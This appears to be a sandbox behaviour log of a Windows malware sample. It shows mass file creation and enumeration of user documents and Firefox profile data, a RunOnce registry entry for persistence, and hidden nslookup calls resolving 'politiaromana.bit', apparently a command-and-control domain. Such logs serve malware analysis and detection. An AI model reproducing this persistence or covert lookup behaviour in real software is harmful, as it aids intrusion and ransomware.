Create Z:\k45e5zDG7.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\kjDb0JPxXV.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\jOJaIjFheEW0T.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\iR5AlC5ioa.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\byOgrXTqMWyQA.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\cutoBa.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\uaDwX5CMU5U3ucB.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\IKsof.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\LBzJZ0Sa2cEQ2n6qcw3.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\a7Qw6I.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ij5BP3IVD95.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\4wTKrcVkUP.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\BCcVJ1ufkJ.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\XB4dDmeUIpvrtaFxi.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\7GrhyEMiwBBm2mof.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\iYqEjip6ZD7yL0q2o40t.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\klftX5pih07o.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\B1jyWDTc76Rz9y3Upp.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\oxutnkIjKB.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\tHwCdQmMoSd.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\VI1xj.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\AEAoxD1Men.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SmlQzbt58YRNZL1.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\BKUsAPb4ObOA3nffiu.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\zg8vtsMD.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\St0RmHrDVByM7p25RVJ.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\QeR6tf3.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\5X5bvQKCD.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\dHIr0PyqgW0.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\XMjApX5V6.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SPmVqqj8wFtWH.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\KLpg3Rdw1l.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Vi3sQD.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Keq3DmENGzTu.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\lfR9rINk9dEZ.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SkCFLGl.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\HkvYL3k.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Tdjnpl4mS5gutb0FZJX9.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\bagG03Siv8fZOaNznAH.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\p87Mkvx4n6eR91T.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\cUJr74E.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\5nMxkl.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\X2ZrVB60bDAK3cZl14f.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\CEkSQb1l9V40Cea.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ib3F5TJ.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\KFk2iz2CjAH.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ZfiqBIWgc6yC8hqpAMBh.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\BSTdcQ8gXiWpbdQJ9j9.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\j1HIB7qSx.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe type = size True 1
Fn
Get Info C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini type = file_attributes True 1
Fn
Get Info Z:\ggNuzUYFd.swf type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT.LOG1 type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT.LOG2 type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf type = file_attributes True 1
Fn
Get Info Z:\QbYwYSoMD3beKw.mkv type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms type = file_attributes True 1
Fn
Get Info Z:\fUHonlL.swf type = file_attributes True 1
Fn
Get Info Z:\brgVKnP3IVGPPX.pps type = file_attributes True 1
Fn
Get Info Z:\PCEJlbmpwZ68QNsWdvWo.mp4 type = file_attributes True 1
Fn
Get Info Z:\zP0nKisr4oLuznV8Y.pptx type = file_attributes True 1
Fn
Get Info Z:\DR2HdhXM7A.xls type = file_attributes True 1
Fn
Get Info Z:\0uoW8iDiO9C0q.jpg type = file_attributes True 1
Fn
Get Info Z:\ctwtFUQdhyq9B0.flv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite type = file_attributes True 1
Fn
Get Info Z:\wwWTiMqjx6hY7AqmcQRC.rtf type = file_attributes True 1
Fn
Get Info Z:\ZluEZ8VfU.ppt type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\pluginreg.dat type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\prefs.js type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\321b9820-ddf0-4472-8833-27c2104c93fa type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\search.json.mozlz4 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\secmod.db type = file_attributes True 1
Fn
Get Info Z:\AeKHMJrNCDYUq.ots type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionCheckpoints.json type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\previous.js type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\upgrade.js-20170814072924 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore.js type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\SiteSecurityServiceState.txt type = file_attributes True 1
Fn
Get Info Z:\usc0a0c3QarsfV.docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata-v2 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata-v2 type = file_attributes True 1
Fn
Get Info Z:\Ft1MOn1CIc.pdf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite type = file_attributes True 1
Fn
Get Info Z:\1taL0c72JXkGj.docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\times.json type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\webappsstore.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\xulstore.json type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\profiles.ini type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\NzZfBRffU.gif type = file_attributes True 1
Fn
Get Info Z:\EmullYJgNTq8y.odt type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\QO6C.pdf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\roottools.conf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\sLivwNIVhI-acv9KYt.wav type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\sOc9HFGjfdRL.mp4 type = file_attributes True 1
Fn
Get Info Z:\fJJNxlZPFcIOL7N8L.pps type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\ssWXjNJMpxPjy0RSh1p_.ots type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\TJzRR99g_04.bmp type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\U1cYWKMQhIFnmv.png type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\vJP1qxGfwRfh.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\W02IZ8W8.pptx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\WBlnF.xls type = file_attributes True 1
Fn
Get Info Z:\hjOwYAb7YQ2odlEyn.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\wJ1QEd.flv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\wspnyXL.mkv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\wZyb.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\xVXRkU.wav type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\ye-zc9.docx type = file_attributes True 1
Fn
Get Info Z:\ZcRis.ppt type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\1bpDeojNY.mkv type = file_attributes True 1
Fn
Get Info Z:\pEtobMGPdVk4C2adw.csv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\8ANG45s-M.png type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\A 9Oefy3.jpg type = file_attributes True 1
Fn
Get Info Z:\sEi0K8sZnqEl5.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\a-lLcBqkNo0RJG2z.mp4 type = file_attributes True 1
Fn
Get Info Z:\oXr639hN3x86Bhd.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\Au9hR3twSX8g2051qZl.mp3 type = file_attributes True 1
Fn
Get Info Z:\XmnJxoBkEp9WD4cyN.gif type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2kU40FT5jILta3Q.ots type = file_attributes True 1
Fn
Get Info Z:\KtzEQVEZQWFLdAY3Qn.odt type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\2yagpCprWdKgC2scR.m4a type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\h4pimh4sgK50.swf type = file_attributes True 1
Fn
Get Info Z:\sbZAE.wav type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\iaY8BIN_Ck.gif type = file_attributes True 1
Fn
Get Info Z:\ukO9D2qllnBsxnQ.pptx type = file_attributes True 1
Fn
Get Info Z:\UsVrBfwU9tuC5KFqX2K.swf type = file_attributes True 1
Fn
Get Info Z:\gr07JV38A.gif type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\lixRrd6cN_iDgM01kX.m4a type = file_attributes True 1
Fn
Get Info Z:\BhX74jJaOIdhyhcSe5G9.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\BLmcr9LSO0w4rDxAY08\VFrEBVJ.gif type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\Bprz1OZFvY6Fdl.wav type = file_attributes True 1
Fn
Get Info Z:\xQ6SLR9y03J4ITfu7P.flv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\cBGy__kii3.xlsx type = file_attributes True 1
Fn
Get Info Z:\4z3uag.rtf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\dh6vAu4ORBB.gif type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\DOC6131166051-PDF.js type = file_attributes True 1
Fn
Get Info Z:\BokNObz8UcZzwf.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\DuYjI_5DnwCjkTeKrN.bmp type = file_attributes True 1
Fn
Get Info Z:\rYZw8NqY13.ots type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\eXcXexGNR8.bmp type = file_attributes True 1
Fn
Get Info Z:\Kn7qhmeLrMy5AdqLU92.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\FGn1g2A5L35Dban.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\FxUvkMkkJlA0u3uO.wav type = file_attributes True 1
Fn
Get Info Z:\sDKhau.doc type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\gQz9z2t2-T6sBFh.ods type = file_attributes True 1
Fn
Get Info Z:\8qGeXH1kIXTzNAwh1.pptx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\GrVNye2A_G.m4a type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\hbpLjDWaRc.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\KLQs0N5HQVpYWEwm.avi type = file_attributes True 1
Fn
Get Info Z:\991tuWIWnfwOaO.rtf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\KOHm3 dV9oyll.mkv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\LjIGlO1g4.jpg type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\lv-MFQ.wav type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\MzXcX bzXrqd45Lfz4s.bmp type = file_attributes True 1
Fn
Get Info Z:\LOFKJdnEn4MzMXm.rtf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\PCTxqfmg90.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\pLBOkTAFuYRgMO.gif type = file_attributes True 1
Fn
Get Info Z:\RH3IiU0yMrDFNR6DKs.pdf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\Q _Vg7gr8H.mp4 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\TaihMyjD\A2LolHZayGTsHiI6.m4a type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2oS82VM\3xZTjcYNMEA.jpg type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2oS82VM\4DdBg.pptx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2oS82VM\q8_fCWTtYsp.mp3 type = file_attributes True 1
Fn
Get Info Z:\iWJTz4KEmPveSMxUQ8.bmp type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\2QWqJ.png type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\40xf9IqVMYI.m4a type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\owR x2a.swf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\TQB8IjiKavnd9-4DZ\emVhgx6y97.mkv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\TQB8IjiKavnd9-4DZ\l6Bs1VDS IveszkK_T.swf type = file_attributes True 1
Fn
Get Info Z:\qU7Og9CaR8xuh.rtf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\TaihMyjD\XhgAzlnnal4On.ods type = file_attributes True 1
Fn
Get Info Z:\lEAREuPn69.mp4 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\Desktop\TaihMyjD\YLRzWU41I lCyJDHV C6.png type = file_attributes True 1
Fn
For performance reasons, the remaining 2015 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (34)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce value_name = duyccbpmaea, data = "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe", size = 88, type = REG_SZ True 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create nslookup politiaromana.bit ns1.virmach.ru os_pid = 0xdc4, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup politiaromana.bit ns1.virmach.ru os_pid = 0xee4, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Module (2748)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x74120000 True 3
Fn
Load KERNEL32.dll base_address = 0x74120000 True 2
Fn
Load msvcr100.dll base_address = 0x6f970000 True 1
Fn
Load USER32.dll base_address = 0x76840000 True 1
Fn
Load GDI32.dll base_address = 0x764e0000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76dc0000 True 1
Fn
Load SHELL32.dll base_address = 0x750e0000 True 1
Fn
Load CRYPT32.dll base_address = 0x74c50000 True 1
Fn
Load WININET.dll base_address = 0x6fdc0000 True 1
Fn
Load PSAPI.DLL base_address = 0x74560000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x74120000 True 12
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x76e90000 True 7
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76dc0000 True 1232
Fn
Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 True 2
Fn
